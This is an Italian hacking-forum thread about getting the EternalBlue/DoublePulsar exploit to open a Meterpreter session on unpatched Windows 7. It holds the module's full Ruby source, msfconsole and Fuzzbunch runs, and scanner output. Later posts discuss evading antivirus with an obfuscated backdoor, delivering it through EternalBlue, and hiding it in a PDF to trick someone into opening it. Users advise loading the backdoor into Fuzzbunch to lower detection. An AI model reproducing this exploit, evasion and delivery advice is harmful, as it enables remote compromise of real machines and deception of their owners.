Domanda eternalblue Doublepulsar "Exploit completed, but no session was created"

Stato
Discussione chiusa ad ulteriori risposte.

neo8004

Utente Electrum
30 Novembre 2015
163
30
9
100
Ciao a tutti,

sto provando questo exploit su macchina virtuale Windows 7 64bit Ultimate non aggiornato con la patch MS17-10 e con antivirus escluso.
Se faccio lo scanner MS17-10 mi restituisce che la macchina è vulnerabile, lanciando l'exploit però non mi crea la sessione meterpreter.

Vi allego tutta la sequenza, grazie per l'eventuale aiuto.



Codice:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64
targetarchitecture => x64
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       wlms.exe                                         yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.1.73                                     yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.73     no        The target address


Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(eternalblue_doublepulsar) > run

[*] Started bind handler
[*] 192.168.1.73:445 - Generating Eternalblue XML data
[*] 192.168.1.73:445 - Generating Doublepulsar XML data
[*] 192.168.1.73:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.73:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.73:445 - Launching Eternalblue...
[+] 192.168.1.73:445 - Backdoor is already installed
[*] 192.168.1.73:445 - Launching Doublepulsar...
[+] 192.168.1.73:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
 
Sono quasi convinto che il problema stia nel processo in cui injectare la dll, che nel caso di una macchina a 64bit va settato a lsass.exe o explorer.exe.
 
ho provato con entrambi ma niente, dovrei avere qualche altro errore:

posto sia il codice che la schermata di metasploit

eternalblue_doublepulsar.rb

Codice:
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  #include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'EternalBlue',
      'Description' => %q{
          This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
     After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your      payload selection).
     You can use this module to compromise a host remotely (among the targets available) without needing          nor authentication neither target's user interaction.
     ** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
      },
      'Author'      =>
        [
          'Pablo Gonzalez (@pablogonzalezpe)',
          'Sheila A. Berta (@UnaPibaGeek)'
        ],
       'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'DefaultTarget'  => 8,
      'Targets'        =>
        [
     ['Windows XP (all services pack) (x86) (x64)',{}],
     ['Windows Server 2003 SP0 (x86)',{}],
     ['Windows Server 2003 SP1/SP2 (x86)',{}],
     ['Windows Server 2003 (x64)',{}],
          ['Windows Vista (x86)',{}],
     ['Windows Vista (x64)',{}],
     ['Windows Server 2008 (x86) ',{}],
     ['Windows Server 2008 R2 (x86) (x64)',{}],
     ['Windows 7 (all services pack) (x86) (x64)',{}]
   ],
      'Arch'           => [ARCH_X86,ARCH_X64],
     'ExitFunc'      => 'thread',
     'Target'          => 0,
      'License'     => MSF_LICENSE,
       )

       )

   register_options([
       OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
       OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/usr/share/metasploit-framework/modules/exploits/windows/smb/deps/']),
       OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/usr/share/metasploit-framework/modules/exploits/windows/smb/deps/']),
       OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
       OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','lsass.exe'])
   ], self.class)

  register_advanced_options([
    OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]),
    OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll'])
  ], self.class)

  end

  def exploit

  #Custom XML Eternalblue
  print_status('Generating Eternalblue XML data')
  cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
  sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
  sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
  sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

  #WIN72K8R2 (4-8) and XP (0-3)
  if target.name =~ /7|2008|Vista/
   objective = "WIN72K8R2"
  else
   objective = "XP"
  end

  sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

  #Custom XML Doublepulsar
  print_status('Generating Doublepulsar XML data')
  cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  dllpayload = datastore['WINEPATH'] + datastore['DLLName']
  dllpayload2 = dllpayload.gsub('/','\/')
  sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`

  #Generate DLL
  print_status("Generating payload DLL for Doublepulsar")
  pay = framework.modules.create(datastore['payload'])
  pay.datastore['LHOST'] = datastore['LHOST']
  dll = pay.generate_simple({'Format'=>'dll'})
  File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
   print_status("Writing DLL in #{dllpayload}")
   f.print dll
  end

  #Send Exploit + Payload Injection
  print_status('Launching Eternalblue...')
  output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
  if output =~ /=-=-WIN-=-=/
     print_good("Pwned! Eternalblue success!")
  elsif output =~ /Backdoor returned code: 10 - Success!/
   print_good("Backdoor is already installed")
  else
   print_error("Are you sure it's vulnerable?")
  end
  print_status('Launching Doublepulsar...')
  output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
  if output2 =~ /Backdoor returned code: 10 - Success!/
   print_good("Remote code executed... 3... 2... 1...")
  else
   print_error("Oops, something was wrong!")
  end  

  handler

 end

end

metasploit-framework

Codice:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64targetarchitecture => x64
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                                     Required  Description
   ----                ---------------                                                     --------  -----------
   DOUBLEPULSARPATH    /usr/share/metasploit-framework/modules/exploits/windows/smb/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /usr/share/metasploit-framework/modules/exploits/windows/smb/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       lsass.exe                                                           yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.1.73                                                        yes       The target address
   RPORT               445                                                                 yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                                                 yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                                                yes       WINE drive_c path


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.73     no        The target address


Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(eternalblue_doublepulsar) > run

[*] Started bind handler
[*] 192.168.1.73:445 - Generating Eternalblue XML data
[*] 192.168.1.73:445 - Generating Doublepulsar XML data
[*] 192.168.1.73:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.73:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.73:445 - Launching Eternalblue...
[+] 192.168.1.73:445 - Backdoor is already installed
[*] 192.168.1.73:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.1.73:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
 
Prima di tutto grazie x l'aiuto.

Ora da metasploit funziona, invece da console di armitage mi da sempre il messaggio che non mi crea la sessione.

Se attivo l'antivirus in entrambi i casi non crea la sessione proverò con veil.
 
Ultima modifica:
Con vari processi di criptazione ed offuscamento sono riuscito a creare un file exe, ora lo posso integrare ad eternalblue senza l'uso di ingegneria sociale? Devo crearlo in dll e farlo inserire nel PROCESSINJECT?9
 
Ultima modifica:
Con vari processi di criptazione ed offuscamento sono riuscito a creare un file exe, ora lo posso integrare ad eternalblue senza l'uso di ingegneria sociale?
Per fare ciò dovresti avere qualche conoscenza di programmazione. Comunque nulla di complicato credo. Scarica Fuzzbunch e aggiungi il tuo modulo sottoforma di file XML per poter lanciare la tua backdoor.
 
Grazie lo provo!!!

Ma potrei anche offuscarlo in un file PDF è fattibile? Sarebbe più semplice convincere qualcuno ad aprirlo.
 
Grazie lo provo!!!

Ma potrei anche offuscarlo in un file PDF è fattibile? Sarebbe più semplice convincere qualcuno ad aprirlo.
perchè inviare un pdf quando puoi hackerarlo senza social engineering solo tramite fuzzbunch exploit eternalblue? quello che ti ha detto cutl4ass riguarda come implementare il tuo payload offuscato nel modulo fuzzbunch così invece che inviare un payload comune e rilevato da ogni antivirus avvii il tuo offuscato e meno detectabile
 
Certo ho capito.
Ho installato fuzzbunch e per il momento mi da un errore di connessione al target ma vedrò come risolvere.
Avete da consigliarmi un tutorial o altro materiale su come iniettare il mio payload offuscato tramite xml?

Grazie
 
Certo ho capito.
Ho installato fuzzbunch e per il momento mi da un errore di connessione al target ma vedrò come risolvere.
Avete da consigliarmi un tutorial o altro materiale su come iniettare il mio payload offuscato tramite xml?

Grazie
Per l`errore di fuzzbunch ho fatto una guida sulla sezione pentesting sulla sottobranca guide di exploit dove spiego un po' tutto invece su come injectarlo appena sono a casa ti passo una guida
 
la mia connessione è tramite LAN quindi, come indicato nella tua guida, dovrei avere un problema di Port forwarding.

questo è il log che mi restituisce Fuzzbunch-debian:

Codice:
[+] Set Project => prova

fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.73

fb Special (Eternalblue) > apply
[*] Applying Session Parameters
fb Special (Eternalblue) > echo Running Exploit Touches
[*] Running Exploit Touches
fb Special (Eternalblue) > touch all
fb Special (Eternalblue) > enter Special

fb Special (Eternalblue) > prompt confirm

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value                                                 
----                  -----                                                 
NetworkTimeout        60                                                   
TargetIp              192.168.1.73                                         
TargetPort            445                                                   
VerifyTarget          True                                                 
VerifyBackdoor        True                                                 
MaxExploitAttempts    3                                                     
GroomAllocations      12                                                   
Target                WIN72K8R2                                             

[!] plugin variables are valid

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.


[*]  TargetIp :: Target IP Address


[*]  TargetPort :: Port used by the SMB service for exploit connection


[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.


[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.


[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.


[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.


[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs


fb Special (Eternalblue) > execute

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[+] Run Mode: FB

[*] Redirection ON

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[+] (TCP) Local 192.168.1.76:6666 -> 192.168.1.73:445

[+] Configure Plugin Remote Tunnels


Local
=====

Proto   Listen IP           Source IP        Destination IP  
-----   -----------------   --------------   ----------------
TCP     192.168.1.76:6666   Redirector:ANY   192.168.1.73:445

Remote
======

 *empty*

[!] Verify Redirection Tunnels Exist

Module: Eternalblue
===================

Name                  Set Value       Redirected Value   
----                  ---------       ----------------   
DaveProxyPort         0                                   
NetworkTimeout        60                                 
TargetIp              192.168.1.73    192.168.1.76       
TargetPort            445             6666               
VerifyTarget          True                               
VerifyBackdoor        True                               
MaxExploitAttempts    3                                   
GroomAllocations      12                                 
ShellcodeBuffer                                           
Target                WIN72K8R2                           

[*] Executing Plugin
[!] Plugin failed
[-] Error: Eternalblue Failed

bisogna che riprova a settare il port forwarding.
 
la mia connessione è tramite LAN quindi, come indicato nella tua guida, dovrei avere un problema di Port forwarding.

questo è il log che mi restituisce Fuzzbunch-debian:

Codice:
[+] Set Project => prova

fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.73

fb Special (Eternalblue) > apply
[*] Applying Session Parameters
fb Special (Eternalblue) > echo Running Exploit Touches
[*] Running Exploit Touches
fb Special (Eternalblue) > touch all
fb Special (Eternalblue) > enter Special

fb Special (Eternalblue) > prompt confirm

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value                                               
----                  -----                                               
NetworkTimeout        60                                                 
TargetIp              192.168.1.73                                       
TargetPort            445                                                 
VerifyTarget          True                                               
VerifyBackdoor        True                                               
MaxExploitAttempts    3                                                   
GroomAllocations      12                                                 
Target                WIN72K8R2                                           

[!] plugin variables are valid

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.


[*]  TargetIp :: Target IP Address


[*]  TargetPort :: Port used by the SMB service for exploit connection


[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.


[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.


[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.


[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.


[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs


fb Special (Eternalblue) > execute

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[+] Run Mode: FB

[*] Redirection ON

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[+] (TCP) Local 192.168.1.76:6666 -> 192.168.1.73:445

[+] Configure Plugin Remote Tunnels


Local
=====

Proto   Listen IP           Source IP        Destination IP
-----   -----------------   --------------   ----------------
TCP     192.168.1.76:6666   Redirector:ANY   192.168.1.73:445

Remote
======

 *empty*

[!] Verify Redirection Tunnels Exist

Module: Eternalblue
===================

Name                  Set Value       Redirected Value 
----                  ---------       ---------------- 
DaveProxyPort         0                                 
NetworkTimeout        60                               
TargetIp              192.168.1.73    192.168.1.76     
TargetPort            445             6666             
VerifyTarget          True                             
VerifyBackdoor        True                             
MaxExploitAttempts    3                                 
GroomAllocations      12                               
ShellcodeBuffer                                         
Target                WIN72K8R2                         

[*] Executing Plugin
[!] Plugin failed
[-] Error: Eternalblue Failed

bisogna che riprova a settare il port forwarding.
No aspetta tramite WAN hai problema di port forwarding non tramite LAN ma questo non è problema di port forwarding questo sembra proprio l`errore che da quando il pc "vittima" è stato patchato per la vulnerabilità con la patch di Maggio
 
IMG_3088.JPG


Ragazzi bn giorno stessa problematica su W7 32bit sp1 non aggiornato utilizzato solo per attacchi interni [emoji23][emoji23]

Payload utilizzati meterpreter/reverse_tcp
Windows/shell/reverse_tcp

Ma entrambi i casi fallisce alla connessione ormai accetto volentieri consigli [emoji23][emoji23] bn giornata


Inviata da iPhone tramite app ufficiale di Inforge.net
 
No aspetta tramite WAN hai problema di port forwarding non tramite LAN ma questo non è problema di port forwarding questo sembra proprio l`errore che da quando il pc "vittima" è stato patchato per la vulnerabilità con la patch di Maggio

questo è il LOG dell'errore

Codice:
[*] Connecting to target for exploitation.
[-] Error connecting to target
[+] CORE terminated with status code 0xdf5d000b
[-] Error getting output back from Core; aborting...
[*] Core thread exit code: 0x00000000
[*] Proxy thread exit code:   0x00000000
/e questa la risposta di MS scanner su Armitage

Codice:
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.73
RHOSTS => 192.168.1.73
msf auxiliary(smb_ms17_010) > set SMBDomain .
SMBDomain => .
msf auxiliary(smb_ms17_010) > set THREADS 24
THREADS => 24
msf auxiliary(smb_ms17_010) > set RPORT 445
RPORT => 445
msf auxiliary(smb_ms17_010) > run -j
[*] Auxiliary module running as background job
[+] 192.168.1.73:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
 
Visualizza allegato 23107

Ragazzi bn giorno stessa problematica su W7 32bit sp1 non aggiornato utilizzato solo per attacchi interni [emoji23][emoji23]

Payload utilizzati meterpreter/reverse_tcp
Windows/shell/reverse_tcp

Ma entrambi i casi fallisce alla connessione ormai accetto volentieri consigli [emoji23][emoji23] bn giornata


Inviata da iPhone tramite app ufficiale di Inforge.net
Ciao Rebecca guarda questa è la mia guida sugli errori di fuzzbunchhttps://www.inforge.net/xi/threads/guida-setup-e-risoluzioni-problemi-fuzzbunch-exploit-container-di-eternalblue-doublepulsar-ecc.477772/ leggiila tutta se possibile ma ciò che ti interessa particolarmente è il punto numero 8 della parte RISOLUZIONE PROBLEMI
 
questo è il LOG dell'errore

Codice:
[*] Connecting to target for exploitation.
[-] Error connecting to target
[+] CORE terminated with status code 0xdf5d000b
[-] Error getting output back from Core; aborting...
[*] Core thread exit code: 0x00000000
[*] Proxy thread exit code:   0x00000000
/e questa la risposta di MS scanner su Armitage

Codice:
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.73
RHOSTS => 192.168.1.73
msf auxiliary(smb_ms17_010) > set SMBDomain .
SMBDomain => .
msf auxiliary(smb_ms17_010) > set THREADS 24
THREADS => 24
msf auxiliary(smb_ms17_010) > set RPORT 445
RPORT => 445
msf auxiliary(smb_ms17_010) > run -j
[*] Auxiliary module running as background job
[+] 192.168.1.73:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
Ciao neo allora anche tu controlla il punto 8 della mia guida nella zona RISOLUZIONE PROBLEMI poiché anche se lo scan dice che sei vulnerabile quello sta solamente a vedere, come lo scanner di eset, la versione del file di sistema srv.sys oppure invia un pacchetto simile a quello dell`exploit al smb server tuttavia se hai effettuato l`aggiornamennto di windows defender oppure di windows in generale anche il semplice windows firewall può bloccare l`attacco oppure se hai un antivirus attivo il suo firewall blocca di sicuro l`exploit; ci sono comunque altre 2 possibilità 1 che il firewall del router non ti permette l`exploit e qui non puoi fare quasi nulla come ho detto nella guida (anche se questa cosa avviene specialmente quando lavori in WAN cioè in rete remota) oppure il protocollo smb v1 e v2 sul computer vittima non è attivo e per attivarlo e per verificare se è attivo segui questa guida microsoft https://support.microsoft.com/it-it...-smbv1-smbv2-and-smbv3-in-windows-and-windows ti dico ciò perché l`errore evidenzia che il pc non riesce proprio a connettersi alla vittima
 
Ciao Rebecca guarda questa è la mia guida sugli errori di fuzzbunchhttps://www.inforge.net/xi/threads/guida-setup-e-risoluzioni-problemi-fuzzbunch-exploit-container-di-eternalblue-doublepulsar-ecc.477772/ leggiila tutta se possibile ma ciò che ti interessa particolarmente è il punto numero 8 della parte RISOLUZIONE PROBLEMI

Ciao script [emoji4][emoji4] ti ringrazio della tua risposta ... ho verificato ma io eseguo solo le modalità da una LAN ..testo i miei attacchi da una macchina virtuale Parrots Security montata su una macchina ospitante Windows 8.1 64 bit

Quindi non penso possa influire firewall della macchina ospitante ...macchina virtuale nn possiede antivirus ne iptables configurati.
Spero trovare altre dritte in quanto la mia riguarda solamente una tesi di studio [emoji106][emoji106]


Inviata da iPhone tramite app ufficiale di Inforge.net
 
Ciao script [emoji4][emoji4] ti ringrazio della tua risposta ... ho verificato ma io eseguo solo le modalità da una LAN ..testo i miei attacchi da una macchina virtuale Parrots Security montata su una macchina ospitante Windows 8.1 64 bit

Quindi non penso possa influire firewall della macchina ospitante ...macchina virtuale nn possiede antivirus ne iptables configurati.
Spero trovare altre dritte in quanto la mia riguarda solamente una tesi di studio [emoji106][emoji106]


Inviata da iPhone tramite app ufficiale di Inforge.net
Allora il problema potrebbe venire dal fatto che la macchina virtuale è completamente isolata anche riguardo la rete con la macchina windows ciò è verificabile provando a pingare l`indirizzo di una delle due macchine con l`altra
Prova anche ciò che ti ha detto cutl4ss anche se qui il problema è di connessione
 
Stato
Discussione chiusa ad ulteriori risposte.